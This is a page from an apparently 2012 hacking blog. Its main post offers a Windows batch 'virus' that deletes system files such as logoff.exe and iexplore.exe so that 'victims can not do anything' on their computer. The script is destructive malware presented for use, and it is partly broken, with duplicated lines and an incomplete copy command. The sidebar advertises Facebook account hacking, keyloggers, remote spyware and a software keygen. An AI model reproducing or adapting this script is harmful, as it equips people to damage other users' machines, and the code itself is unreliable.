Search This Blog
Categories
- Games (1)
- Hack Facebook (7)
- Hacker News (3)
- Internet Hacks (2)
- Keylogger (4)
- Password Cracking (1)
- Programming (3)
- Security Tips (2)
- Tools (3)
Blog Archive
-
2012
(24)
-
October
(24)
- Facebook Hack | How to Hack a Facebook account pas...
- How to hack someone’s Facebook account: Hacking Fa...
- Facebook hack: Browser Hack for Facebook
- Facebook Status Update With XFBML Injection-Facebo...
- Facebook Button Hacking Trick
- Learn To create Keylogger using C++|Basic Hacking ...
- KeyCobra Hardware Keyloggers
- Scan files for Virus and Keylogger in Online for f...
- Sniperspy-Best and Advanced Remote Keylogger Download
- Create a virus to create a infinite folder in a drive
- Virus to Delete mouse,explore,logoff using Batch P...
- C++ ,Batch Virus code to disable All Hard disk
- 12 Child Porn websites take down by Anonymous
- Punto.pe, Peru Domain provider hacked and data lea...
- Anonymous Hackers claims responsibility for HSBC c...
- 6 Web Security Risks of Not Monitoring Internet Ac...
- Blackhat SEO poisoning attacks
- Nicole's baby kicking video is a Facebook scam
- New Facebook Hacking Tool ~Stealing Facebook profi...
- How to Use Ravan for Password Cracking?
- Portspoof : Service Signature Obfuscator
- Download Backtrack 5 R3 , a Penetration testing linux
- jSQL Injection, a Java GUI for database injection
- EA Games Generic Multi KeyGen v214
-
October
(24)
Ads 468x60px
Social Icons
?
+
X
Recommended for you
Loading..
loading
Featured Posts
Saturday, October 20, 2012
Virus to Delete mouse,explore,logoff using Batch Programming
Usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.
I hope that you know how to create batch programming. If you don't know please read previous posts about Batch Programming.
@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internetexplorer\iexplore.exe
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internetexplorer\iexplore.exe
I hope that you know how to create batch programming. If you don't know please read previous posts about Batch Programming.
Labels:Programming
Subscribe to:
Post Comments
(Atom)
Archives
-
▼
2012
(24)
-
▼
October
(24)
- Facebook Hack | How to Hack a Facebook account pas...
- How to hack someone’s Facebook account: Hacking Fa...
- Facebook hack: Browser Hack for Facebook
- Facebook Status Update With XFBML Injection-Facebo...
- Facebook Button Hacking Trick
- Learn To create Keylogger using C++|Basic Hacking ...
- KeyCobra Hardware Keyloggers
- Scan files for Virus and Keylogger in Online for f...
- Sniperspy-Best and Advanced Remote Keylogger Download
- Create a virus to create a infinite folder in a drive
- Virus to Delete mouse,explore,logoff using Batch P...
- C++ ,Batch Virus code to disable All Hard disk
- 12 Child Porn websites take down by Anonymous
- Punto.pe, Peru Domain provider hacked and data lea...
- Anonymous Hackers claims responsibility for HSBC c...
- 6 Web Security Risks of Not Monitoring Internet Ac...
- Blackhat SEO poisoning attacks
- Nicole's baby kicking video is a Facebook scam
- New Facebook Hacking Tool ~Stealing Facebook profi...
- How to Use Ravan for Password Cracking?
- Portspoof : Service Signature Obfuscator
- Download Backtrack 5 R3 , a Penetration testing linux
- jSQL Injection, a Java GUI for database injection
- EA Games Generic Multi KeyGen v214
-
▼
October
(24)
Blogroll
Top Read
-
EA Games Generic Multi KeyGen v214 .exe File Format (KeyGen) EA Games Keygen is a powerful Keygen, that can generate product keys for...
-
The Anonymous Hackers collective claimed that they take down 12 child pornography websites. They found that illegal contents are being host...
-
Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batc...
-
We discussed about Facebook hacking software – Facebook Freezer in my earlier article How to hack someones Facebook account . But, Faceboo...
-
The portspoof program is designed to enhance OS security through emulation of legitimate service signatures on otherwise closed ports. The g...
-
BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in B...
-
Internet access is one of the most important things you can provide to your users. It’s a morale booster, it helps them do their job (for s...
-
An easy to use SQL injection tool for retrieving database informations from a distant server. jSQL Injection features: GET, POST, he...
-
Sniperspy is best and Advanced Keylogger. It allows you to monitor your victim remotely like a television. No physical installation co...
-
Today i am going to introduce KeyCobra Hardware Keyloggers. KeyCobra provides three type of Hardware Keyloggers. They are Wi-Fi Hardwa...
0 comments:
Post a Comment